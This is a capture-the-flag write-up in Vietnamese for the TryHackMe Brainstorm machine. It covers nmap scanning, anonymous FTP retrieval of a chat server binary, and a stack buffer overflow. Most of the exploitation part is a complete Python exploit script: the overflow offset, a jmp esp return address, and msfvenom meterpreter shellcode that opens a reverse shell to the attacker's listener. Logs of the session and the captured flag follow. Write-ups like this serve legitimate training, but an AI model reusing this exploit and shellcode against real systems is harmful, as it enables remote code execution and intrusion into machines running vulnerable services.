Brainstorm

Recon

Nmap

# Nmap 7.95 scan initiated Sun Oct 20 12:21:37 2024 as: "C:\\Program Files (x86)\\Nmap\\nmap.exe" --unprivileged -A -T3 -Pn -oN nmap.log 10.10.30.35
Nmap scan report for 10.10.30.35
Host is up (0.34s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
| ftp-syst: 
|_  SYST: Windows_NT
3389/tcp open  ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=brainstorm
| Not valid before: 2024-10-19T04:03:40
|_Not valid after:  2025-04-20T04:03:40
| rdp-ntlm-info: 
|   Target_Name: BRAINSTORM
|   NetBIOS_Domain_Name: BRAINSTORM
|   NetBIOS_Computer_Name: BRAINSTORM
|   DNS_Domain_Name: brainstorm
|   DNS_Computer_Name: brainstorm
|   Product_Version: 6.1.7601
|_  System_Time: 2024-10-20T05:24:54+00:00
|_ssl-date: 2024-10-20T05:25:16+00:00; 0s from scanner time.
9999/tcp open  abyss?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     Welcome to Brainstorm chat (beta)
|     Please enter your username (max 20 characters): Write a message:
|   NULL: 
|     Welcome to Brainstorm chat (beta)
|_    Please enter your username (max 20 characters):
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
# Nmap done at Sun Oct 20 12:25:19 2024 -- 1 IP address (1 host up) scanned in 221.98 seconds

FTP

FTP cho phép đăng nhập ẩn danh nên ta thực hiện thăm dò các tập tin và tìm thấy thư mục chatserver:

ftp 10.10.30.35
Connected to 10.10.30.35.
220 Microsoft FTP Service
200 OPTS UTF8 command successful - UTF8 encoding now ON.
User (10.10.30.35:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
 
230 User logged in.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19  08:36PM       <DIR>          chatserver
226 Transfer complete.
ftp: 54 bytes received in 0.00Seconds 54000.00Kbytes/sec.

Analysis

Tải về 2 tập tin ở trong thư mục chatserver:

ftp> cd chatserver
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
chatserver.exe
essfunc.dll
226 Transfer complete.
ftp: 32 bytes received in 0.00Seconds 32000.00Kbytes/sec.
ftp> get chatserver.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp: 43747 bytes received in 1.68Seconds 26.04Kbytes/sec.
ftp> get essfunc.dll
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp: 30761 bytes received in 1.35Seconds 22.85Kbytes/sec.
ftp> bye
221 Goodbye.

Tìm thấy offset ở vị trí 2012 bằng cách sử dụng IDA để debug và Python để fuzz.

Biết được chatserver.exe nạp lên essfunc.dll và DLL này có một vài chỉ thị jmp esp. Chúng ta sẽ sử dụng chỉ thị ở địa chỉ 0x625014df.

Xác định các bad character và không tìm thấy ký tự nào (trừ 0x00).

Tạo shellcode có chứa meterpreter payload sử dụng msfvenom và lắng nghe ở port 1337.

Exploit

Viết script thực thi như sau:

import socket
 
ip = "10.10.188.182"
port = 9999
 
prefix = ""
offset = 2012
overflow = "A" * offset
retn = "\xdf\x14\x50\x62"  # 0x625014df
padding = "\x90" * 16
payload = ""
payload += "\xdb\xcc\xbe\x53\x1f\x62\x9f\xd9\x74\x24\xf4"
payload += "\x5b\x2b\xc9\xb1\x59\x83\xc3\x04\x31\x73\x15"
payload += "\x03\x73\x15\xb1\xea\x9e\x77\xba\x15\x5f\x88"
payload += "\xa4\x24\x8d\x01\xc1\x23\xba\x40\x39\x27\xee"
payload += "\x68\xb2\x65\x1b\x40\x3b\x02\x51\x8a\xcc\xa2"
payload += "\xdc\xec\xe3\x0c\x4c\xcc\x62\xf1\x8f\x01\x44"
payload += "\xc8\x5f\x54\x85\x0d\x16\x12\x6a\xc3\xfe\x57"
payload += "\x26\xf4\x8b\x2a\xfa\xf5\x5b\x21\x42\x8e\xde"
payload += "\xf6\x36\x22\xe0\x26\x3d\xe2\xc2\x96\x40\xc0"
payload += "\x88\x5f\x5a\x63\x47\x2b\x66\x5a\xa7\x9d\x1d"
payload += "\xa8\xdc\x1f\xf7\xe0\x22\xde\x38\x0f\x0f\xe0"
payload += "\x01\x28\xaf\x96\x79\x4a\x52\xa1\xba\x30\x88"
payload += "\x24\x5c\x92\x5b\x9e\xb8\x22\x8f\x79\x4b\x28"
payload += "\x64\x0d\x13\x2d\x7b\xc2\x28\x49\xf0\xe5\xfe"
payload += "\xdb\x42\xc2\xda\x80\x11\x6b\x7b\x6d\xf7\x94"
payload += "\x9b\xc9\xa8\x30\xd0\xf8\xbf\x45\x19\x03\xc0"
payload += "\x1b\x8d\xcf\x0d\xa4\x4d\x58\x05\xd7\x7f\xc7"
payload += "\xbd\x7f\x33\x80\x1b\x87\x42\x86\x9b\x57\xec"
payload += "\xc7\x65\x58\x0c\xc1\xa1\x0c\x5c\x79\x03\x2d"
payload += "\x37\x79\xac\xf8\xad\x73\x3a\x09\x33\x81\xa4"
payload += "\x65\x31\x89\xdd\x4c\xbc\x6f\x8d\xfe\xee\x3f"
payload += "\x6e\xaf\x4e\x90\x06\xa5\x41\xcf\x37\xc6\x88"
payload += "\x78\xdd\x29\x64\xd0\x4a\xd3\x2d\xaa\xeb\x1c"
payload += "\xf8\xd6\x2c\x96\x08\x26\xe2\x5f\x79\x34\x13"
payload += "\x38\x81\xc4\xe4\xad\x81\xae\xe0\x67\xd6\x46"
payload += "\xeb\x5e\x10\xc9\x14\xb5\x23\x0e\xea\x48\x15"
payload += "\x64\xdd\xde\x19\x12\x22\x0f\x99\xe2\x74\x45"
payload += "\x99\x8a\x20\x3d\xca\xaf\x2e\xe8\x7f\x7c\xbb"
payload += "\x13\x29\xd0\x6c\x7c\xd7\x0f\x5a\x23\x28\x7a"
payload += "\xd8\x24\xd6\xf8\xf7\x8c\xbe\x02\x48\x2d\x3e"
payload += "\x69\x48\x7d\x56\x66\x67\x72\x96\x87\xa2\xdb"
payload += "\xbe\x02\x23\xa9\x5f\x12\x6e\x6f\xc1\x13\x9d"
payload += "\xb4\xf2\x6e\xee\x4b\xf3\x8e\xe6\x2f\xf4\x8e"
payload += "\x06\x4e\xc9\x58\x3f\x24\x0c\x59\x04\x37\x3b"
payload += "\xfc\x2d\xd2\x43\x52\x2d\xf7"
postfix = ""
 
buffer = prefix + overflow + retn + padding + payload + postfix
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
    s.connect((ip, port))
    s.send(b"test user\r\n")
    print(s.recv(1024))
    print("Press any key to send the payload")
    input()
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except:
    print("Could not connect.")
 

Chạy script thực thi và nhận được reverse shell:

[*] Using configured payload generic/shell_reverse_tcp
payload => windows/meterpreter/reverse_tcp
LHOST => tun0
LPORT => 1337
[*] Started reverse TCP handler on 10.2.5.30:1337 
[*] Sending stage (176198 bytes) to 10.10.188.182
[*] Meterpreter session 1 opened (10.2.5.30:1337 -> 10.10.188.182:49349) at 2024-10-20 18:23:54 +0700

Đọc flag:

meterpreter > cd Desktop
meterpreter > pwd
C:\Users\drake\Desktop
meterpreter > cat root.txt
5b1001de5a44eca47eee71e7942a8f8a

Flag(s)

5b1001de5a44eca47eee71e7942a8f8a

References

• TryHackMe | Brainstorm